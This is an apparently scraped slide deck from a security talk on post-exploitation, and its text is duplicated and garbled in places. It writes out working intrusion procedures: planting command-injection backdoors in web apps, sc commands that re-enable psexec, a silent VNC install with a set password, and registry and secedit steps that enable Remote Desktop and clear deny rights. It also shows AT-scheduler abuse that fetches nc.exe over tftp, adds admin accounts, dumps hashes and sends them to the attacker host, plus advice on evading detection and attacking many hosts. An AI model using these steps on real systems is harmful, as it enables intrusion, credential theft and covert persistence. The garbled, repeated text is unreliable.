Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 4: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 4

bull What is thisndash Follow up to Valrsquos and HD Moorersquos

Tactical Exploitation talk from last yearndash A talk about the use of automation

and tactical tools post-exploitationndash Applied techniques ndash Good for LARGE environmentsndash Different perspectives some old

some forgotten some new

Slide 5

Post Exploitation Concepts Overview

Slide 6

What Is Post Exploitation

bull Itrsquos what you do after you get rootndash Note This talk assumes you have access

bull Includesndash Password Managementndash Persistencendash Stealth Evading Detectionndash User Identity Theftndash Feature Modificationndash Automation amp Mass 0wnage

Slide 7

What Is Post Exploitation

bull Getting root is just the beginningndash How do you spreadndash How to manage assets as you go along

bull Lots of tools to help you get rootndash Metasploit Core Canvas Stand alone

bull But what about after breaking inndash Lots of random toolsndash Little automation standardizationndash Archaic hard to use poorly documentedndash Maliciousness often obviousndash Not Scalable to 1000rsquos of hosts (ignoring botnets for this talk)

Slide 8

Password Management

Slide 9

Why Password Management

ndash Large pentests 1000rsquos of passwordsndash Testing a cracked password on many

systems can be time consumingndash Keeping track of cracking sessionsndash Building and growing your wordlist lets

you crack fasterndash Aids in cleanup stage

bull Tying accounts to systems

Slide 10

Password Management Goals

ndash Acquired password storage ndash Organization and tracking

bull What passwords go with which hostsbull What passwords are sharedbull Which users have access to what

resourcesndash Re-use for further accessndash Expanding wordlist for faster

cracking

Slide 11

Password Management Stages amp Techniques

ndash Acquiring pwdump cat etcshadow cachedump sql query sniffing

ndash Decisions Prioritize accounts to crack ndash Cracking John l0pht Cainndash Tracking Nothingndash Reusing Core Impact

Slide 12

Manual Password Management

bull Existing Toolsndash L0phtCrack

bull Stores passwords in session filesndash CainampAbel

bull Static table difficult to export use automatebull Password Classification (NTLM Cisco SQL md5)

ndash Core Impactbull Good for automated reuse of passwords against many hostsbull No real storage management capability

ndash Text file John the Ripperbull Many peoplersquos methodbull Quick and dirty not easily scalable

Slide 13

Slide 14

bull MetaPassbull Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

ndash In the old days a rootkit helped you maintain rootndash Today rootkits are all about hidingndash These two concepts still go hand in hand

Slide 17

Persistence

bull Persistence is maintaining accessbull Why

ndash Targetrsquos can get patchedndash Some exploits are 1 shot onlyndash Sometimes you need to return multiple times to the

targetndash Targetrsquos usefulness not always immediately known

bull Goals Access target as often as neededusefulbull Huge area of studybull Sometimes persistence doesnrsquot matter

Slide 18

Persistence

bull Stages of Persistencendash Initial access

bull Exploitbull Stolen password etc

ndash Decisions What tool to usebull FUZZY ndash OS Environment Target dependent

ndash Setup ndash Re-accessing of targetndash Cleanup Donrsquot be a slob it will get you caught

bull When you no longer need the target leave no trace

Slide 19

Persistence

bull Existing toolsndash Rootkitsndash Backdoorsndash Trojansndash Port knockersndash Adding accountsndash Things like netcat backdoors inetd

modifications process injection stealing credentials etc

Slide 20

Persistence

bull Different perspective on persistencendash If you can always re-exploit who caresndash Inject add modify new vulnerabilities

bull Hard to determine maliciousnessbull We all know its hard to find bugs now

imagine someone is purposefully putting the bugs in

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

• Different Perspective
  – Know the target's environment better than they do
    • If they don't use encryption, maybe you shouldn't either
    • Change strategies to match the environment's normal behavior
  – Don't always default to exploits
    • See the Tactical Exploitation talk
    • IDSs can't see normal behavior that is malicious

Slide 37

Stealth Evading Detection

• Using Windows security objects for stealth
  – Auditing of securable objects is controlled by SACLs
  – Null SACL = no auditing = no logs
  – Writing a SACL requires SeSecurityPrivilege ("Manage auditing and security log"), which local Administrators hold by default

Slide 38

• DEMOS
  – Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

• It's not always about ROOT
• Look like someone else
  – Use the credentials / access of another user
• Goals
  – Change your identity at will
    • User ID, domain credentials, sessions
    • Impersonate system accounts
    • Make activities look like normal user behavior

Slide 41

User Identity Theft

• Stages and techniques
  – Target users
    • Who has access to what?
    • Where is the data?
  – Change identity
    • Hijack credentials / sessions
    • Abuse tokens
  – Access is the end goal, be it data or another system

Slide 42

User Identity Theft

• Existing tools
  – Incognito (Metasploit)
    • Enumerate / hijack tokens
  – FU / FUTo
    • Enable SYSTEM privileges
    • Change process privileges (DKOM)
  – su, sudo, ksu
  – Process injection
  – Hijack domain credentials

Slide 43

User Identity Theft

Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs... Oh My!

• What we want
  – Privileges or SIDs
• What we get
  – Access, Access, Access
• How we get it
  – Incognito vs FUTo

Slide 44

• DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

• Changing existing features or settings to benefit our activities
• Goals
  – Support all post-exploitation activities
  – Disabling detection technologies
  – Enabling insecure or easy-to-use access software

Slide 47

Feature Modification

• Feature modification is basically securable object manipulation
  – Remember all those tokens and security descriptors?
  – These can be modified programmatically and directly
    • Not just through existing tools
  – Stealth / persistence requirements
    • May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: it's still cool (thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying local security policies

Slide 49

Feature Modification

• Enabling psexec
  – PsExec was a great, awesome remote shell / command tool
  – Everybody now disables ClipBook, which psexec requires. l4m3!
  – Let's re-enable it
  – Check first that \\target\ADMIN$ and the remote Service Control Manager (sc \\target query) are reachable; PsExec copies its service binary to ADMIN$ and starts it through the SCM, so if both work the ClipBook/NetDDE services are not what is blocking you

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool, sc.exe:

    net use \\target\ipc$ password /user:username
    sc \\target config netdde start= auto
    sc \\target config netddedsdm start= auto
    sc \\target config clipsrv start= auto
    sc \\target start netdde
    sc \\target start netddedsdm
    sc \\target start clipsrv

  – Note the space after "start=": sc requires it

Slide 51

Feature Modification

• Enabling VNC (from the command line)
  – Go get VNC (check out guh.nu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder:
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit /s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents:

    [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
    "SocketConnect"=dword:00000001
    "AutoPortSelect"=dword:00000001
    "InputsEnabled"=dword:00000001
    "LocalInputsDisabled"=dword:00000000
    "IdleTimeout"=dword:00000000
    "QuerySetting"=dword:00000002
    "QueryTimeout"=dword:0000000a
    "PollUnderCursor"=dword:00000000
    "PollForeground"=dword:00000001
    "PollFullScreen"=dword:00000000
    "OnlyPollConsole"=dword:00000001
    "OnlyPollOnEvent"=dword:00000000
    "Password"=hex:10,4d,89,3d,5a,e1,55,f8

  – The Password value is WinVNC's obfuscated form of "infected" (a fixed-key DES of the password, not a hash); anyone who can read the key can recover it, which is why slide 22's trick of copying the registry password works

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: the system controlling access to security doors
  – No command-line way of modifying the system, need GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However, it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

    [Unicode]
    Unicode=yes
    [Version]
    signature="$CHICAGO$"
    Revision=1
    [Privilege Rights]
    seremoteinteractivelogonright = hacked_account
    seinteractivelogonright = hacked_account
    sedenyinteractivelogonright =
    sedenyremoteinteractivelogonright =
    sedenynetworklogonright =

  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account
  – The three empty "sedeny..." lines clear those deny lists entirely, including accounts the admins deliberately denied; that is a visible change to anyone who runs gpresult or rsop.msc afterwards

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

  – Create another file named enable_ts.reg:

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
    "fDenyTSConnections"=dword:00000000
    "TSEnabled"=dword:00000001
    "TSUserEnabled"=dword:00000000

  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
    • secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"
  – orig.secedit.sdb is your cleanup copy: put it back when you are done
  – If a domain GPO sets these user rights, the next policy refresh (gpupdate included) re-applies it over the local database, so confirm the result afterwards with secedit /export or gpresult
  – The host firewall still has to allow TCP 3389 before you can connect

Slide 55

• DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – The Schedule (Task Scheduler) service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – ClipBook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

    net use \\target\ipc$ password /user:username
    at \\target 12:00pm "command"
    Ex: at \\192.168.1.1 12:00pm "tftp -i myip GET nc.exe"

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Adding users
  – Messing with the registry / policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM
  – No console comes back to you: redirect output to a file and fetch it, or have the job send it

Slide 60

Abusing The Scheduler

• Building a tool around AT – Flow
  – Establish an authenticated session
  – Determine the time on the target
  – Pass commands to the target to be run 1 min from now
    • net time only reports minutes, so "+1 min" can be seconds away; a time that has already passed makes AT run the job tomorrow
  – Write a batch file that executes everything at once
  – Have the target send you back whatever info you want
  – Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – net use \\target
  – net time \\target
  – at \\target <net time + 1 min> "tftp -i <us> GET e.bat"
  – at \\target <net time + 2 min> e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hash-dumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use, re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – the theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to:
    • All the people from offensivecomputing, nologin, uninformed, IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

Slide 8

Password Management

Slide 9

Why Password Management?

  – Large pentests: 1000s of passwords
  – Testing a cracked password on many systems can be time consuming
  – Keeping track of cracking sessions
  – Building and growing your wordlist lets you crack faster
  – Aids in the cleanup stage
    • Tying accounts to systems

Slide 10

Password Management Goals

  – Acquired password storage
  – Organization and tracking
    • What passwords go with which hosts
    • What passwords are shared
    • Which users have access to what resources
  – Re-use for further access
  – Expanding the wordlist for faster cracking

Slide 11

Password Management Stages & Techniques

  – Acquiring: pwdump, cat /etc/shadow, cachedump, SQL query, sniffing
  – Decisions: prioritize accounts to crack
  – Cracking: John, l0pht, Cain
  – Tracking: nothing
  – Reusing: Core Impact

Slide 12

Manual Password Management

• Existing Tools
  – L0phtCrack
    • Stores passwords in session files
  – Cain & Abel
    • Static table, difficult to export / use / automate
    • Password classification (NTLM, Cisco, SQL, md5)
  – Core Impact
    • Good for automated reuse of passwords against many hosts
    • No real storage management capability
  – Text file + John the Ripper
    • Many people's method
    • Quick and dirty, not easily scalable

Slide 13

Slide 14

• MetaPass
• Demos

Slide 15

Persistence

Slide 16

A word on Stealth vs Persistence

  – In the old days a rootkit helped you maintain root
  – Today rootkits are all about hiding
  – These two concepts still go hand in hand

Slide 17

Persistence

• Persistence is maintaining access
• Why?
  – Targets can get patched
  – Some exploits are 1-shot only
  – Sometimes you need to return multiple times to the target
  – The target's usefulness is not always immediately known
• Goals: access the target as often as needed / useful
• Huge area of study
• Sometimes persistence doesn't matter

Slide 18

Persistence

• Stages of Persistence
  – Initial access
    • Exploit
    • Stolen password, etc.
  – Decisions: what tool to use
    • FUZZY – OS / environment / target dependent
  – Setup
  – Re-accessing of target
  – Cleanup: don't be a slob, it will get you caught
    • When you no longer need the target, leave no trace

Slide 19

Persistence

• Existing tools
  – Rootkits
  – Backdoors
  – Trojans
  – Port knockers
  – Adding accounts
  – Things like netcat backdoors, inetd modifications, process injection, stealing credentials, etc.

Slide 20

Persistence

• Different perspective on persistence
  – If you can always re-exploit, who cares?
  – Inject / add / modify new vulnerabilities
    • Hard to determine maliciousness
    • We all know it's hard to find bugs now; imagine someone is purposefully putting the bugs in

Slide 21

Persistence

• Leveraging existing persistent admin access
  • Nagios checks
  • Attack configuration management
    – Cfengine
    – SMS
    – Automated patching systems ("patch" them with our trojans)
  • GUIs
  • Tool distribution

Slide 22

Persistence

• Example
• Machine has VNC installed
• Replace the installed VNC with a vulnerable version
  – Authentication bypass
• Copy the registry password so the target doesn't realize
• Persistence with no backdoors or rootkits to get detected

Slide 23

Persistence

• Add vulnerable code
• Example: web apps
  – Take out user input validation
  – Inject your vulnerable code
• Focus on vague intent
• Never be obviously and solely malicious
  – Look for apps with previous vulnerabilities
  – Re-introduce patched bugs

Slide 24

Persistence

• More web app examples
• Add a hidden field to an HTML form
  – Users detect no change, app performs normally

    <input type="hidden" name="Lang">

• Edit the web app and tie vulnerable Perl code to the form field input:

    if (defined $hidden_field) { open($filename, ">$hidden_field"); }

• Craft a POST including the hidden field

Slide 25

Persistence

• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute your commands
• Who needs to bind a shell to a port?
• Unlikely to ever be detected
  – Especially good in big apps
  – Code review can't even be sure of maliciousness
  – Some sites replace code every X time period
• No rootkits to install
• Tripwire probably won't see this

Slide 26

Persistence

• Take the concept to another level
  – Add a decoder to the web app
  – Look for a "trigger" string combination in form fields
  – If Name = John Smith and Age = 42, then execute the contents of the Address field
  – URL-encode form entries containing commands
  – Have an identifier "stub" in the encoded data for the app to find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
